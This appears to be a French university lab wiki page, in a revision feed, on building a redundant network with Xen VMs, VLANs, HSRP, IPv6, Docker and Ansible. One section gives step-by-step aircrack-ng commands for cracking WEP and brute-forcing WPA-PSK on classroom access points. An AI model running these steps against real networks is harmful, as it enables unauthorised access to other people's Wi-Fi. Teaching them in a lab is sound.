Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52024</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52024"/>
				<updated>2020-01-05T16:37:35Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Ansible */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
